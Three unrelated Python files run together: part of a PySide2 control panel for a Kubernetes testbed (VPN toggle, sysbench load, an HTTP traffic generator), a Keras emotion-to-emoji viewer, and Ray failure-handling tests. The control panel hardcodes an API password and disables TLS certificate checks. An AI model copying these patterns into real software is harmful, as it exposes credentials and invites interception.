self.uprightLayout.addWidget(self.clabel,1,0,1,1)
self.uprightLayout.addWidget(self.ccombobox,1,1,1,1)
self.uprightLayout.addWidget(self.cbuttonstart,1,2,1,1)
self.uprightLayout.addWidget(self.cbuttonmessage,2,0,4,3)
# upleftlayout.addWidget(abuttonstop,1,1)
# Down Left Widget 정의
self.downleftWidget = QWidget()
self.downleftLayout = QGridLayout()
self.downleftWidget.setLayout(self.downleftLayout)
self.bmessage = MyLabel('Load Generator')
# self.bmessage.setStyleSheet("background-color : black; color : white; font-size: 14pt; font-weight: bold;")
self.bmessage.setAlignment(Qt.AlignCenter)
self.bbuttonmessage = MyTextEdit("")
self.m_label_gif = QLabel()
self.m_label_gif.setText("aaa")
self.m_movie_gif = QtGui.QMovie("resources/image/Spin-1s-200px.gif")
self.m_label_gif.setMovie(self.m_movie_gif)
self.m_label_gif.setSizePolicy(QSizePolicy.Ignored, QSizePolicy.Ignored )
self.m_label_gif.setScaledContents(True)
self.m_gif_flag = False
#Global.signal.stopBbtnCompleteSignal.connect(self.closeUI)
self.bbuttonstart = MyButton('Load', 2)
self.bbuttonstop = MyButton('Stop', 3)
#self.setStyle(self.bbuttonstart,1)
#self.setStyle(self.bbuttonstop,2)
# self.setStyle(self.bbuttonmessage,7)
# self.bbuttonstart.clicked.connect(self.buttonB_Start_event)
# self.bbuttonstop.clicked.connect(self.buttonB_Stop_event)
self.bcombobox = MyComboBox()
self.sysbenchInfoList = self.getSvcSysbenchs()
self.BClusterList = [Event() for i in range (0, len(self.sysbenchInfoList))]
for i in range(0, len(self.sysbenchInfoList)):
self.bcombobox.addItem(self.sysbenchInfoList[i].clusterName)
self.getLoadGenStatusAndSetText()
# for i in ClusterList:
# self.bcombobox.addItem(i)
# self.bcombobox.addItems(ClusterList)
self.bcombobox2 = MyComboBox()
self.bcombobox2.addItem("1")
self.bcombobox2.addItem("2")
self.bcombobox2.addItem("3")
self.bcombobox2.addItem("4")
self.bcombobox2.addItem("5")
self.bcombobox2.addItem("6")
# self.bcombobox2.addItem("Max")
self.blabel = MyLabel('Cluster:',3)
self.blabel2 = MyLabel('Load Level:',3)
self.bbuttonstart.clicked.connect(self.buttonB_Start_event)
self.bbuttonstop.clicked.connect(self.buttonB_Stop_event)
# self.bbuttonicon = PySide2.QtGui.QPixmap("assets/button3.png")
# self.bicon = PySide2.QtGui.QIcon(self.bbuttonicon)
# self.bbuttonstart.setIcon(self.bicon)
# self.bbuttonstart.setIconSize(self.bbuttonicon.rect().size())
# self.bbuttonstart.setIconSize(QSize(200,200))
# self.bbuttonstart.setFixedSize(self.bbuttonicon.rect().size())
#self.setStyle(self.bbuttonstart,3)
#self.setStyle(self.bbuttonstop,4)
#self.setStyle(self.bbuttonmessage,7)
#self.setStyle(self.bmessage,6)
#self.setStyle(self.bcombobox,10)
#self.setStyle(self.bcombobox2,10)
# self.downleftLayout.addWidget(self.bbuttonmessage,0,0,1,2)
# self.downleftLayout.addWidget(self.bbuttonstart,1,0)
# self.downleftLayout.addWidget(self.bbuttonstop,1,1)
self.downleftLayout.addWidget(self.bmessage,0,0,1,6)
self.downleftLayout.addWidget(self.blabel,1,0,1,1)
self.downleftLayout.addWidget(self.bcombobox,1,1,1,1)
self.downleftLayout.addWidget(self.blabel2,1,2,1,1)
self.downleftLayout.addWidget(self.bcombobox2,1,3,1,1)
self.downleftLayout.addWidget(self.bbuttonstart,1,4,1,1)
self.downleftLayout.addWidget(self.bbuttonstop,1,5,1,1)
self.downleftLayout.addWidget(self.bbuttonmessage,2,0,4,5)
self.downleftLayout.addWidget(self.m_label_gif,2,5,4,1)
self.upleftWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
self.uprightWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
self.downleftWidget.setSizePolicy(
QSizePolicy.Expanding,QSizePolicy.Expanding
)
# Main Layout에 각 Sub Widget들 배치
self.grid.addWidget(self.upleftWidget,0,0,1,1)
self.grid.addWidget(self.uprightWidget,0,1,1,1)
self.grid.addWidget(self.downleftWidget,1,0,1,2)
def getToken(self):
#run_command("echo -n | openssl s_client -connect openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > server.crt")
headers = {
'Content-type': 'application/json',
}
data = '{"username":"openmcp","password":"keti"}'
response = requests.post('https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/token', headers=headers, data=data, verify=False)
#response = requests.post(tokenUrl, headers=headers, data=dict_data, verify=False)
print(response.status_code)
response.raise_for_status()
TOKEN = json.loads(response.text).get('token')
return TOKEN
def getAllClusterList(self):
clusterList = []
TOKEN = self.getToken()
headers = {
'Authorization': 'Bearer '+TOKEN,
}
params = (
('clustername', 'openmcp'),
)
url = "https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/apis/core.kubefed.io/v1beta1/namespaces/kube-federation-system/kubefedclusters"
response = requests.get(url, headers=headers, params=params, verify=False)
print(response.status_code)
print(response.text)
response.raise_for_status()
loaded = json.loads(response.text)
for cluster in loaded.get('items'):
clusterName = cluster.get('metadata').get('name')
print("clusterName:", clusterName)
clusterList.append(clusterName)
return clusterList
def getSvcSysbenchs(self):
allClusterList = self.getAllClusterList()
sysbenchInfoList = []
TOKEN = self.getToken()
headers = {
'Authorization': 'Bearer '+TOKEN,
}
queue = Queue()
procs = []
for clusterName in allClusterList:
params = (
('clustername', clusterName),
)
proc = Process(target=self.getSvcSysbench,args=(clusterName, headers, params, queue))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
print("join complete", queue.qsize())
for i in range(queue.qsize()):
print("join complete" ,i)
try:
sysbenchInfoList.append(queue.get())
except:
print(queue.qsize())
print("get complete" )
return sysbenchInfoList
def getSvcSysbench(self, clusterName, headers, params, queue):
url = "https://openmcp-apiserver.openmcp.default-domain.svc.openmcp.example.org:8080/api/v1/namespaces/"+Global.Load_Namespace+"/services/"+Global.Load_Svc_Name
try:
response = requests.get(url, headers=headers, params=params, verify=False, timeout=5)
except requests.exceptions.Timeout:
print(clusterName+' Timeout')
return
except Exception as e:
print(clusterName+ 'except', e)
return
print(clusterName, response.status_code)
response.raise_for_status()
if response.text != "":
#print(response.text)
loaded = json.loads(response.text)
svcIP = loaded.get('status').get('loadBalancer').get('ingress')[0].get('ip')
if svcIP == None:
svcIP = loaded.get('status').get('loadBalancer').get('ingress')[0].get('hostname')
svcPort = ""
for port in loaded.get('spec').get('ports'):
if port["name"] =="http-sysbench":
svcPort = port["port"]
break
print(clusterName, svcIP, svcPort)
p = SysbenchInfo(clusterName=clusterName,svcIP=svcIP,svcPort=svcPort)
print("q put")
queue.put(p)
return
def buttonA_Init(self):
if getStatus():
out = run_command(VPN_STATUS)
contry = ""
for item in out:
if "Connected to " in item:
contry = item.split("Connected to")[1]
break
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("pwnbit.kr",443))
self.abuttonmessage.setText("[Status] : <font color=\"green\">Connected</font><br>[Contry] : "+contry+"<br>[IPaddr] : "+sock.getsockname()[0])
self.abuttonstart.setText('DisConnect')
self.abuttonstart.setStyle(5)
else:
self.abuttonmessage.setText("[Status] : <font color=\"red\">DisConnected</font>")
self.abuttonstart.setText('Connect')
self.abuttonstart.setStyle(4)
def buttonA_func_Connect(self):
# while True:
print("A Connect func Text is :",self.acombobox.currentText())
alias = CountryList[self.acombobox.currentText()]
connect_alias(alias)
# if eventA.is_set():
# break
def buttonA_func_DisConnect(self):
# while True:
# print("A Disconnet func")
time.sleep(1)
disconnect()
print("disconnected")
# if eventA.is_set():
# break
def buttonA_Start_event(self): # 버튼 A 시작 이벤트 처리
# global eventA
if getStatus():
self.abuttonstart.setText("Connect")
self.abuttonstart.setStyle(4)
self.buttonA_func_DisConnect()
self.abuttonmessage.setText("[Status] : <font color=\"red\">DisConnected</font>")
self.processlist[0] = 0
else:
self.abuttonstart.setText("DisConnect")
self.abuttonstart.setStyle(5)
# if eventA.is_set():
# eventA = Event()
self.buttonA_func_Connect()
contry = self.acombobox.currentText()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("pwnbit.kr",443))
self.abuttonmessage.setText("[Status] : <font color=\"green\">Connected</font><br>[Contry] : "+contry+"\n[IPaddr] : "+sock.getsockname()[0])
# proc = Process(target=buttonA_func,args=(even))
# proc.start()
self.processlist[0] = 1
def requestTraffic(self, i, reqPerTh):
url = Global.Traffic_URL
for n in range (0, reqPerTh):
reqNum = (reqPerTh*i)+n
print("Http Get(",reqNum,") Request Start")
response = requests.get(url, verify=False, allow_redirects=False, stream=True)
print("Status code (",reqNum,"):", response.status_code)
def buttonC_func_SendTraffic(self, connectedNum):
while True:
ths = []
reqPerTh = 100
thNum = int(connectedNum/reqPerTh)
for i in range(0,thNum):
th = Thread(target=self.requestTraffic, args=(i,reqPerTh))
#proc = Process(target=self.requestTraffic, args=(i,))
#proc.daemon = True
ths.append(th)
th.start()
for th in ths:
th.join()
# if self.eventC.is_set():
# print("Traffic Ended")
# break
print("Traffic wait for "+str(Global.Traffic_Period)+"s")
time.sleep(Global.Traffic_Period)
def buttonC_func_DisConnect(self):
#self.eventC.set()
self.procTraffic.kill()
print("C Disconnet func")
print("Traffic Ended")
def buttonC_Start_event(self): # 버튼 C 시작 이벤트 처리
if self.processlist[2] != 0:
self.cbuttonstart.setStyle(4)
#self.setStyle(self.cbuttonstart,1)
self.buttonC_func_DisConnect()
self.cbuttonstart.setText("Send")
self.cbuttonmessage.setText("[Status] : <font color=\"red\">Disable</font>")
self.processlist[2] = 0
else:
#self.setStyle(self.cbuttonstart,2)
self.cbuttonstart.setStyle(5)
# if self.eventC.is_set():
# self.eventC = Event()
connectedNum = int(self.ccombobox.currentText())
print("C Connect func Text is :", connectedNum)
self.procTraffic = Process(target=self.buttonC_func_SendTraffic, args=(connectedNum,))
self.procTraffic.daemon = True
self.procTraffic.start()
self.cbuttonstart.setText("Stop")
self.cbuttonmessage.setText("[Status] : <font color=\"green\">Enable</font><br>[CCU] : "+str(connectedNum)+"<br>[Period] : "+str(Global.Traffic_Period)+"s<br>[Target] : "+Global.Traffic_URL)
# proc = Process(target=buttonA_func,args=(even))
# proc.start()
self.processlist[2] = 1
    def getLoadGenStatusAndSetText(self):
        """Poll each sysbench service's /status endpoint and refresh the UI.

        A cluster whose status output contains at least one
        " Status : START / Level : N" line is marked active, recording the
        highest N seen.
        """
        for i, sysinfo in enumerate(self.sysbenchInfoList):
            print(sysinfo.svcIP,sysinfo.svcPort)
            response = requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/status")
            response.raise_for_status()
            if response.text != "":
                maxlevel = 0
                print(response.text)
                findflag = False
                substring = " Status : START / Level : "
                for item in response.text.split("\n"):
                    if substring in item:
                        findflag = True
                        level = int(item.split(substring)[1])
                        maxlevel = max(maxlevel, level)
                if findflag:
                    # NOTE(review): findText() returns -1 when the name is
                    # missing, which would silently update the *last* list
                    # entry — confirm the combobox always contains every
                    # cluster in sysbenchInfoList.
                    j = self.bcombobox.findText(sysinfo.clusterName)
                    self.sysbenchInfoList[j].loadLevel = maxlevel
                    self.BClusterList[j].set()
        self.setGenText()
def setGenText(self):
Bmessegetext = ""
for i in range (len(self.BClusterList)) :
if self.BClusterList[i].is_set() == True :
Bmessegetext = Bmessegetext + "["+ self.sysbenchInfoList[i].clusterName + "] : <font color=\"green\">ON</font>, [Load Level] :" + str(self.sysbenchInfoList[i].loadLevel) + "<br>"
self.bbuttonmessage.setText(Bmessegetext)
    def buttonB_Start_event(self):
        """Start CPU+memory load on the selected cluster at the chosen level."""
        # Ignore clicks while the stop-spinner is showing.
        if self.m_gif_flag == True:
            return
        # Already running on this cluster: nothing to do.
        if self.BClusterList[self.bcombobox.currentIndex()].is_set():
            print("Cluster '" + self.bcombobox.currentText() + "' is Running")
            return
        self.BClusterList[self.bcombobox.currentIndex()].set()
        for i, sysinfo in enumerate(self.sysbenchInfoList):
            if self.sysbenchInfoList[i].clusterName == self.bcombobox.currentText():
                self.sysbenchInfoList[i].loadLevel = self.bcombobox2.currentText()
                break
        # NOTE(review): the code below relies on the loop variable `sysinfo`
        # leaking out of the for-loop; if no cluster matched, the *last*
        # entry is targeted — confirm the combobox always mirrors
        # sysbenchInfoList.
        params = (
            ('v', str(sysinfo.loadLevel)),
        )
        requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/cpu/start", params=params)
        requests.get("http://"+sysinfo.svcIP+":"+str(sysinfo.svcPort)+"/memory/start", params=params)
        self.setGenText()
def hideLoadingUI(self):
self.m_movie_gif.stop()
self.m_label_gif.hide()
self.setGenText()
self.m_gif_flag = False
    def buttonB_Stop_event(self):
        """Stop the load generator on the selected cluster (async, with spinner)."""
        # Ignore clicks while a stop is already in progress.
        if self.m_gif_flag == True:
            return
        self.m_gif_flag = True
        self.BClusterList[self.bcombobox.currentIndex()].clear()
        # NOTE(review): relies on the loop variable `sysinfo` leaking past the
        # loop; if nothing matches, the *last* entry is stopped — confirm the
        # combobox always mirrors sysbenchInfoList.
        for i, sysinfo in enumerate(self.sysbenchInfoList):
            if self.sysbenchInfoList[i].clusterName == self.bcombobox.currentText():
                break
        self.m_movie_gif.start()
        self.m_label_gif.show()
        # Run the HTTP stop calls off the UI thread; the completion signal
        # hides the spinner via hideLoadingUI.
        self.th = Task(sysinfo)
        Global.signal.stopBbtnCompleteSignal.connect(self.hideLoadingUI)
        self.th.start()
class Task(QThread):
    """Worker thread that stops cpu/memory load on one sysbench service."""

    def __init__(self, sysinfo):
        super().__init__()
        self.sysinfo = sysinfo

    def run(self):
        base = "http://" + self.sysinfo.svcIP + ":" + str(self.sysinfo.svcPort)
        requests.get(base + "/cpu/stop")
        requests.get(base + "/memory/stop")
        # Tell the UI thread it may hide the spinner now.
        Global.signal.stopBbtnCompleteSignal.emit()
if __name__ == '__main__':
    print(sys.path)
    #QCoreApplication.setLibraryPaths([sys.path[5] + '/PySide2/plugins'])
    # Launch the Qt application; exec_() blocks until the window is closed.
    app = QApplication(sys.argv)
    window = Form()
    window.show()
    app.exec_()
|
emoji.py | import tkinter
from tkinter import *
import tkinter
import cv2
from PIL import Image, ImageTk
import os
import numpy as np
import cv2
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D
from keras.optimizer_v2 import adam
from keras.layers import MaxPooling2D
from keras.preprocessing.image import ImageDataGenerator
import threading
os.environ['TF_XLA_FLAGS'] = '--tf_xla_enable_xla_devices'

# Build the emotion-classification CNN: 48x48 grayscale input, 7 classes out.
emotion_model = Sequential()
emotion_model.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(48,48,1)))
emotion_model.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Dropout(0.25))
emotion_model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))
emotion_model.add(MaxPooling2D(pool_size=(2, 2)))
emotion_model.add(Dropout(0.25))
emotion_model.add(Flatten())
emotion_model.add(Dense(1024, activation='relu'))
emotion_model.add(Dropout(0.5))
emotion_model.add(Dense(7, activation='softmax'))
# NOTE(review): this *saves* the freshly-initialized (untrained) weights, so
# every prediction below is effectively random. Presumably this was meant to
# be emotion_model.load_weights('model4.h5') — confirm against the training
# script before changing.
emotion_model.save_weights('model4.h5')
cv2.ocl.setUseOpenCL(False)
# Emotion index -> display label. ("Frearful"/"surpriced" typos are runtime
# strings / on-disk file names and are deliberately left untouched.)
emotion_dict = {0: " Angry ",1: " Disgusted " ,2:" Frearful ",3:" Happy ",4:" Neutral ",5:" Sad ",6 : " Surprised " }
cur_path = os.path.dirname(os.path.abspath(__file__))
# Emotion index -> emoji image path (relative to this file).
emoji_dist = {0:cur_path+"/emojis/angry.png",1:cur_path+"/emojis/disgusted.png",2:cur_path+"/emojis/fearful.png",3:cur_path+"/emojis/happy.png",4:cur_path+"/emojis/neutral.png",5:cur_path+"/emojis/sad.png",6:cur_path+"/emojis/surpriced.png",}
# `global` at module scope is a no-op; kept as-is.
global last_frame1
last_frame1 = np.zeros((480 , 640, 3), dtype=np.uint8)
global cap1
# show_text[0] holds the index of the most recently detected emotion,
# shared between show_subject (writer) and show_avatar (reader).
show_text=[0]
global frame_number
#video processing function
def show_subject():
    """Grab one video frame, detect faces, classify the emotion, display the
    annotated frame, and reschedule itself via Tk's after().

    Side effects: advances the module-level frame_number, updates
    show_text[0] with the last predicted emotion index, and refreshes lmain.
    """
    # NOTE(review): the capture (and the cascade below) is re-opened on every
    # call, i.e. every ~10 ms — presumably both should be created once at
    # module level; confirm before restructuring.
    cap1 = cv2.VideoCapture(r'C:\Users\Sajid\OneDrive\Desktop\Azam.mp4')
    if not cap1.isOpened():
        print("cant open the camera1")
    global frame_number
    length = int(cap1.get(cv2.CAP_PROP_FRAME_COUNT))
    frame_number += 1
    # Past the last frame: terminate the whole program.
    if frame_number >= length:
        exit()
    cap1.set(1,frame_number)  # seek to the current frame index
    flag1, frame1 = cap1.read()
    frame1 = cv2.resize (frame1,(500,650))
    bounding_box = cv2.CascadeClassifier(r'C:\Users\Sajid\anaconda3\Lib\site-packages\cv2\data\haarcascade_frontalface_default.xml')
    gray_frame = cv2.cvtColor(frame1, cv2.COLOR_BGR2GRAY)
    num_faces = bounding_box.detectMultiScale(gray_frame,scaleFactor =1.3 ,minNeighbors = 5)
    for(x,y,w,h) in num_faces:
        cv2.rectangle(frame1,(x,y-50),(x+w , y+h+10),(255,0,0) ,2)
        roi_gray_frame = gray_frame[y:y + h, x:x + w]
        # Model expects shape (1, 48, 48, 1): add batch and channel axes.
        cropped_img = np.expand_dims(np.expand_dims(cv2.resize(roi_gray_frame,(48,48)), -1 ), 0)
        prediction = emotion_model.predict(cropped_img)
        maxindex= int(np.argmax(prediction))
        cv2.putText(frame1, emotion_dict[maxindex], (x+20 , y-60), cv2.FONT_HERSHEY_SIMPLEX ,1, (255, 255, 255), 2, cv2.LINE_AA)
        # Publish the latest emotion for show_avatar.
        show_text[0] = maxindex
    if flag1 is None:
        print ("Major error!")
    elif flag1:
        global last_frame1
        last_frame1= frame1.copy()
        pic = cv2.cvtColor(last_frame1 ,cv2.COLOR_BGR2RGB)
        img = Image.fromarray(pic)
        imgtk = ImageTk.PhotoImage(image=img)
        # Keep a reference on the widget so Tk doesn't garbage-collect the image.
        lmain.imgtk = imgtk
        lmain.configure(image=imgtk)
        root.update()
        lmain.after(10, show_subject)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        exit()
#Avatar
def show_avatar():
    """Display the emoji and label for the last detected emotion, then
    reschedule itself via Tk's after()."""
    frame2 = cv2.imread(emoji_dist[show_text[0]])
    pic2 = cv2.cvtColor(frame2, cv2.COLOR_BGR2RGB)
    # fixed: the RGB conversion (pic2) was computed but the raw BGR frame2
    # was displayed, giving red/blue-swapped emoji colors.
    img2 = Image.fromarray(pic2)
    imgtk2 = ImageTk.PhotoImage(image=img2)
    # Keep a reference on the widget so Tk doesn't garbage-collect the image.
    lmain2.imgtk2 = imgtk2
    lmain3.configure(text=emotion_dict[show_text[0]], font=('arial', 45, 'bold'))
    lmain2.configure(image=imgtk2)
    root.update()
    lmain2.after(10, show_avatar)
# main function
if __name__ == '__main__':
    frame_number = 0
    # Build the window: video feed on the left, emoji + label on the right.
    root=tkinter.Tk()
    lmain = tkinter.Label(master=root,padx=50,bd=10)
    lmain2 = tkinter.Label(master=root,bd=10)
    lmain3 = tkinter.Label(master=root,bd=10, fg="#CDCDCD", bg='black')
    lmain.pack(side=LEFT)
    lmain.place(x=50,y=250)
    lmain3.pack()
    lmain3.place(x=960,y=250)
    lmain2.pack(side=RIGHT)
    lmain2.place(x=900,y=350)
    root.title("Photo of Emoji")
    root.geometry("1400x900+100+10")
    root['bg']='black'
    exitButton = Button(root, text='Quit',fg = "red", command=root.destroy, font= ('arial',25,'bold')).pack (side= BOTTOM)
    # NOTE(review): both loops drive Tk widgets from worker threads; Tk is
    # not thread-safe — confirm this is acceptable for this app.
    threading.Thread(target=show_subject).start()
    threading.Thread(target=show_avatar).start()
    root.mainloop()
|
test_failure.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import logging
import os
import sys
import tempfile
import threading
import time
import numpy as np
import pytest
import redis
import ray
import ray.ray_constants as ray_constants
from ray.cluster_utils import Cluster
from ray.test_utils import (
relevant_errors,
wait_for_errors,
RayTestTimeoutException,
)
RAY_FORCE_DIRECT = ray_constants.direct_call_enabled()
def test_failed_task(ray_start_regular):
    """Exceptions raised in remote tasks surface both as pushed errors and
    through ray.get()."""
    @ray.remote
    def throw_exception_fct1():
        raise Exception("Test function 1 intentionally failed.")

    @ray.remote
    def throw_exception_fct2():
        raise Exception("Test function 2 intentionally failed.")

    @ray.remote(num_return_vals=3)
    def throw_exception_fct3(x):
        raise Exception("Test function 3 intentionally failed.")

    # Fire-and-forget tasks: their errors arrive via the error push channel.
    throw_exception_fct1.remote()
    throw_exception_fct1.remote()
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
    assert len(relevant_errors(ray_constants.TASK_PUSH_ERROR)) == 2
    for task in relevant_errors(ray_constants.TASK_PUSH_ERROR):
        msg = task.get("message")
        assert "Test function 1 intentionally failed." in msg

    # ray.get on a failed task must raise.
    x = throw_exception_fct2.remote()
    try:
        ray.get(x)
    except Exception as e:
        assert "Test function 2 intentionally failed." in str(e)
    else:
        # ray.get should throw an exception.
        assert False

    # With multiple return values, every object ref carries the failure.
    x, y, z = throw_exception_fct3.remote(1.0)
    for ref in [x, y, z]:
        try:
            ray.get(ref)
        except Exception as e:
            assert "Test function 3 intentionally failed." in str(e)
        else:
            # ray.get should throw an exception.
            assert False

    class CustomException(ValueError):
        pass

    @ray.remote
    def f():
        raise CustomException("This function failed.")

    # Custom exception types are preserved inside the RayTaskError wrapper.
    try:
        ray.get(f.remote())
    except Exception as e:
        assert "This function failed." in str(e)
        assert isinstance(e, CustomException)
        assert isinstance(e, ray.exceptions.RayTaskError)
        assert "RayTaskError(CustomException)" in repr(e)
    else:
        # ray.get should throw an exception.
        assert False
def test_fail_importing_remote_function(ray_start_2_cpus):
    """A remote function that closes over a module workers cannot import
    produces registration errors and raises on invocation."""
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""

    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    module = __import__(module_name)

    # Define a function that closes over this temporary module. This should
    # fail when it is unpickled (workers don't have the temp dir on sys.path).
    @ray.remote
    def g(x, y=3):
        try:
            module.temporary_python_file()
        except Exception:
            # This test is not concerned with the error from running this
            # function. Only from unpickling the remote function.
            pass

    # Invoke the function so that the definition is exported.
    g.remote(1, y=2)
    wait_for_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR, 2)
    errors = relevant_errors(ray_constants.REGISTER_REMOTE_FUNCTION_PUSH_ERROR)
    assert len(errors) >= 2, errors
    assert "No module named" in errors[0]["message"]
    assert "No module named" in errors[1]["message"]

    # Check that if we try to call the function it throws an exception and
    # does not hang.
    for _ in range(10):
        with pytest.raises(
                Exception, match="This function was not imported properly."):
            ray.get(g.remote(1, y=2))

    f.close()
    # Clean up the junk we added to sys.path.
    sys.path.pop(-1)

def test_failed_function_to_run(ray_start_2_cpus):
    """run_function_on_all_workers failures are pushed once per worker."""
    def f(worker):
        # Raise only on workers, not on the driver.
        if ray.worker.global_worker.mode == ray.WORKER_MODE:
            raise Exception("Function to run failed.")

    ray.worker.global_worker.run_function_on_all_workers(f)
    # Two CPUs -> two workers -> two errors.
    wait_for_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR, 2)
    # Check that the error message is in the task info.
    errors = relevant_errors(ray_constants.FUNCTION_TO_RUN_PUSH_ERROR)
    assert len(errors) == 2
    assert "Function to run failed." in errors[0]["message"]
    assert "Function to run failed." in errors[1]["message"]
def test_fail_importing_actor(ray_start_regular):
    """An actor that closes over an unimportable module fails registration,
    __init__, and method calls — each with its own pushed error."""
    # Create the contents of a temporary Python file.
    temporary_python_file = """
def temporary_helper_function():
    return 1
"""

    f = tempfile.NamedTemporaryFile(suffix=".py")
    f.write(temporary_python_file.encode("ascii"))
    f.flush()
    directory = os.path.dirname(f.name)
    # Get the module name and strip ".py" from the end.
    module_name = os.path.basename(f.name)[:-3]
    sys.path.append(directory)
    module = __import__(module_name)

    # Define an actor that closes over this temporary module. This should
    # fail when it is unpickled.
    @ray.remote
    class Foo:
        def __init__(self, arg1, arg2=3):
            self.x = module.temporary_python_file()

        def get_val(self, arg1, arg2=3):
            return 1

    # There should be no errors yet.
    assert len(ray.errors()) == 0

    # Create an actor.
    foo = Foo.remote(3, arg2=0)

    # Wait for the error to arrive.
    wait_for_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR, 1)
    errors = relevant_errors(ray_constants.REGISTER_ACTOR_PUSH_ERROR)
    assert "No module named" in errors[0]["message"]

    # Wait for the error from when the __init__ tries to run.
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
    errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
    assert ("failed to be imported, and so cannot execute this method" in
            errors[0]["message"])

    # Check that if we try to get the function it throws an exception and
    # does not hang.
    with pytest.raises(Exception, match="failed to be imported"):
        ray.get(foo.get_val.remote(1, arg2=2))

    # Wait for the error from when the call to get_val.
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
    errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
    assert ("failed to be imported, and so cannot execute this method" in
            errors[1]["message"])

    f.close()
    # Clean up the junk we added to sys.path.
    sys.path.pop(-1)

def test_failed_actor_init(ray_start_regular):
    """A failing actor constructor pushes an error, and later method calls
    re-surface the constructor failure."""
    error_message1 = "actor constructor failed"
    error_message2 = "actor method failed"

    @ray.remote
    class FailedActor:
        def __init__(self):
            raise Exception(error_message1)

        def fail_method(self):
            raise Exception(error_message2)

    a = FailedActor.remote()

    # Make sure that we get errors from a failed constructor.
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
    errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert error_message1 in errors[0]["message"]

    # Make sure that we get errors from a failed method.
    # (The method error also references the creation failure, hence
    # error_message1 below.)
    a.fail_method.remote()
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 2)
    errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 2
    assert error_message1 in errors[1]["message"]

def test_failed_actor_method(ray_start_regular):
    """A failing actor method (on a healthy actor) pushes exactly one error."""
    error_message2 = "actor method failed"

    @ray.remote
    class FailedActor:
        def __init__(self):
            pass

        def fail_method(self):
            raise Exception(error_message2)

    a = FailedActor.remote()

    # Make sure that we get errors from a failed method.
    a.fail_method.remote()
    wait_for_errors(ray_constants.TASK_PUSH_ERROR, 1)
    errors = relevant_errors(ray_constants.TASK_PUSH_ERROR)
    assert len(errors) == 1
    assert error_message2 in errors[0]["message"]
def test_incorrect_method_calls(ray_start_regular):
    """Wrong arity and missing attributes on actors raise immediately on the
    caller side."""
    @ray.remote
    class Actor:
        def __init__(self, missing_variable_name):
            pass

        def get_val(self, x):
            pass

    # Make sure that we get errors if we call the constructor incorrectly.

    # Create an actor with too few arguments.
    with pytest.raises(Exception):
        a = Actor.remote()

    # Create an actor with too many arguments.
    with pytest.raises(Exception):
        a = Actor.remote(1, 2)

    # Create an actor the correct number of arguments.
    a = Actor.remote(1)

    # Call a method with too few arguments.
    with pytest.raises(Exception):
        a.get_val.remote()

    # Call a method with too many arguments.
    with pytest.raises(Exception):
        a.get_val.remote(1, 2)

    # Call a method that doesn't exist.
    with pytest.raises(AttributeError):
        a.nonexistent_method()
    with pytest.raises(AttributeError):
        a.nonexistent_method.remote()

def test_worker_raising_exception(ray_start_regular):
    """Corrupting worker-internal state makes the worker crash *after* the
    task completes, producing a WORKER_CRASH push error."""
    @ray.remote
    def f():
        # This is the only reasonable variable we can set here that makes the
        # execute_task function fail after the task got executed.
        ray.experimental.signal.reset = None

    # Running this task should cause the worker to raise an exception after
    # the task has successfully completed.
    f.remote()

    wait_for_errors(ray_constants.WORKER_CRASH_PUSH_ERROR, 1)
def test_worker_dying(ray_start_regular):
    """A worker killed mid-task raises RayWorkerError and pushes WORKER_DIED."""
    # Define a remote function that will kill the worker that runs it.
    @ray.remote(max_retries=0)
    def f():
        eval("exit()")

    with pytest.raises(ray.exceptions.RayWorkerError):
        ray.get(f.remote())

    wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)
    errors = relevant_errors(ray_constants.WORKER_DIED_PUSH_ERROR)
    assert len(errors) == 1
    assert "died or was killed while executing" in errors[0]["message"]

def test_actor_worker_dying(ray_start_regular):
    """A dead actor's pending result raises RayActorError, and tasks that
    consume that result raise RayTaskError."""
    @ray.remote
    class Actor:
        def kill(self):
            eval("exit()")

    @ray.remote
    def consume(x):
        pass

    a = Actor.remote()
    [obj], _ = ray.wait([a.kill.remote()], timeout=5.0)
    with pytest.raises(ray.exceptions.RayActorError):
        ray.get(obj)
    with pytest.raises(ray.exceptions.RayTaskError):
        ray.get(consume.remote(obj))
    wait_for_errors(ray_constants.WORKER_DIED_PUSH_ERROR, 1)

